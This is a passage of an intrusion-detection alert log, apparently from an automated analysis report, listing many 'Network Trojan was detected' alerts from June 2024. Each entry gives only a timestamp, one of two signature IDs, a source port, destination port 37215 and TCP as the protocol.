              Timestamp:06/13/24-21:32:52.660707
              SID:2835222
              Source Port:36804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299047
              SID:2829579
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546507
              SID:2829579
              Source Port:43140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424003
              SID:2829579
              Source Port:59740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256388
              SID:2829579
              Source Port:45052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137066
              SID:2829579
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553810
              SID:2835222
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037641
              SID:2829579
              Source Port:40072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993163
              SID:2829579
              Source Port:52258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453787
              SID:2835222
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154715
              SID:2829579
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129082
              SID:2829579
              Source Port:34868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345473
              SID:2829579
              Source Port:49030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174290
              SID:2835222
              Source Port:36446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316434
              SID:2835222
              Source Port:34294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294984
              SID:2829579
              Source Port:42094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941128
              SID:2835222
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045061
              SID:2829579
              Source Port:35874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781483
              SID:2835222
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264892
              SID:2835222
              Source Port:58446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350659
              SID:2829579
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124799
              SID:2829579
              Source Port:47402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045280
              SID:2835222
              Source Port:55738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087972
              SID:2835222
              Source Port:56580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154872
              SID:2829579
              Source Port:39178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349756
              SID:2835222
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156651
              SID:2829579
              Source Port:47758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406939
              SID:2829579
              Source Port:48700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416784
              SID:2829579
              Source Port:35426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913172
              SID:2835222
              Source Port:53292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930929
              SID:2835222
              Source Port:33548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994206
              SID:2835222
              Source Port:43672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833840
              SID:2835222
              Source Port:60386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248788
              SID:2835222
              Source Port:44000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404201
              SID:2829579
              Source Port:48520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130149
              SID:2835222
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974525
              SID:2835222
              Source Port:51724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041769
              SID:2835222
              Source Port:42622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784374
              SID:2835222
              Source Port:54112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404513
              SID:2829579
              Source Port:38180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296874
              SID:2829579
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550025
              SID:2835222
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198718
              SID:2835222
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177545
              SID:2829579
              Source Port:48496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614305
              SID:2829579
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198018
              SID:2835222
              Source Port:43540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757740
              SID:2829579
              Source Port:40852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832376
              SID:2829579
              Source Port:35578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166742
              SID:2835222
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711691
              SID:2835222
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100743
              SID:2829579
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550707
              SID:2829579
              Source Port:50892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751384
              SID:2829579
              Source Port:60178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953922
              SID:2835222
              Source Port:50750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633389
              SID:2829579
              Source Port:45244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044860
              SID:2835222
              Source Port:44360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150677
              SID:2835222
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403266
              SID:2835222
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355610
              SID:2829579
              Source Port:39592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272355
              SID:2829579
              Source Port:38618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629918
              SID:2835222
              Source Port:51368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886075
              SID:2829579
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379403
              SID:2835222
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109077
              SID:2829579
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655392
              SID:2835222
              Source Port:57888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791341
              SID:2835222
              Source Port:33832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344723
              SID:2829579
              Source Port:51132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973162
              SID:2829579
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279062
              SID:2835222
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223635
              SID:2835222
              Source Port:45916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994014
              SID:2829579
              Source Port:48624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724904
              SID:2835222
              Source Port:34832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154636
              SID:2835222
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130581
              SID:2829579
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831043
              SID:2835222
              Source Port:57488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158116
              SID:2829579
              Source Port:34906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256231
              SID:2835222
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871608
              SID:2829579
              Source Port:46108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354882
              SID:2829579
              Source Port:48396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152371
              SID:2835222
              Source Port:44266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340375
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220444
              SID:2835222
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914394
              SID:2829579
              Source Port:38064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174684
              SID:2829579
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996197
              SID:2829579
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455258
              SID:2829579
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098483
              SID:2829579
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303991
              SID:2835222
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310330
              SID:2835222
              Source Port:39300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937931
              SID:2835222
              Source Port:43006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257206
              SID:2835222
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111721
              SID:2835222
              Source Port:32922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181046
              SID:2835222
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042221
              SID:2829579
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227634
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484604
              SID:2835222
              Source Port:36982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.566928
              SID:2835222
              Source Port:49354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603671
              SID:2835222
              Source Port:40038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952296
              SID:2835222
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258135
              SID:2829579
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075934
              SID:2835222
              Source Port:42062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477743
              SID:2835222
              Source Port:47222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783269
              SID:2835222
              Source Port:47808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658189
              SID:2835222
              Source Port:36282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782258
              SID:2835222
              Source Port:39468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694954
              SID:2835222
              Source Port:42626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091458
              SID:2835222
              Source Port:60334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638233
              SID:2835222
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487674
              SID:2835222
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175424
              SID:2835222
              Source Port:34284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220772
              SID:2835222
              Source Port:33550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884860
              SID:2835222
              Source Port:48250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129386
              SID:2829579
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507598
              SID:2829579
              Source Port:34460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678434
              SID:2829579
              Source Port:37340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509285
              SID:2829579
              Source Port:60200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128690
              SID:2835222
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296425
              SID:2835222
              Source Port:55832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841937
              SID:2835222
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039244
              SID:2829579
              Source Port:45218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754426
              SID:2829579
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912424
              SID:2829579
              Source Port:35580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569653
              SID:2835222
              Source Port:51640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785369
              SID:2829579
              Source Port:44196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160004
              SID:2829579
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078101
              SID:2829579
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274149
              SID:2835222
              Source Port:47280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253384
              SID:2829579
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551910
              SID:2829579
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091744
              SID:2835222
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989369
              SID:2835222
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316666
              SID:2829579
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936277
              SID:2829579
              Source Port:59494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130037
              SID:2829579
              Source Port:48486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969306
              SID:2835222
              Source Port:41108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888164
              SID:2829579
              Source Port:35504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112372
              SID:2829579
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913653
              SID:2829579
              Source Port:47432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214549
              SID:2835222
              Source Port:56542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371112
              SID:2829579
              Source Port:47378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252987
              SID:2829579
              Source Port:37332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658121
              SID:2835222
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440202
              SID:2829579
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564084
              SID:2835222
              Source Port:49206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453901
              SID:2829579
              Source Port:49460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092806
              SID:2829579
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073682
              SID:2835222
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454593
              SID:2835222
              Source Port:34398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996387
              SID:2829579
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088008
              SID:2829579
              Source Port:43332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192616
              SID:2835222
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505597
              SID:2835222
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487300
              SID:2835222
              Source Port:47430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843923
              SID:2829579
              Source Port:35122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248669
              SID:2835222
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783114
              SID:2835222
              Source Port:41832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354155
              SID:2835222
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090963
              SID:2829579
              Source Port:52342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990384
              SID:2835222
              Source Port:53386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546598
              SID:2835222
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914115
              SID:2829579
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547499
              SID:2835222
              Source Port:53708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824839
              SID:2835222
              Source Port:40192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438524
              SID:2835222
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098143
              SID:2829579
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974480
              SID:2835222
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356450
              SID:2829579
              Source Port:59478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528114
              SID:2829579
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255789
              SID:2835222
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375947
              SID:2829579
              Source Port:46936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305848
              SID:2835222
              Source Port:44278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439045
              SID:2835222
              Source Port:48200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088187
              SID:2835222
              Source Port:44320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153460
              SID:2835222
              Source Port:42718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200207
              SID:2829579
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710552
              SID:2835222
              Source Port:45806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271084
              SID:2835222
              Source Port:33796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546764
              SID:2829579
              Source Port:40950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409761
              SID:2835222
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214230
              SID:2835222
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176590
              SID:2829579
              Source Port:44286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308357
              SID:2835222
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128771
              SID:2829579
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271952
              SID:2829579
              Source Port:43884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422589
              SID:2829579
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949848
              SID:2835222
              Source Port:41242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869718
              SID:2829579
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214380
              SID:2829579
              Source Port:55232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192095
              SID:2835222
              Source Port:37412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843688
              SID:2835222
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044785
              SID:2829579
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419623
              SID:2835222
              Source Port:53878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175975
              SID:2835222
              Source Port:42446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221170
              SID:2829579
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417751
              SID:2835222
              Source Port:35030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197560
              SID:2835222
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275775
              SID:2829579
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727062
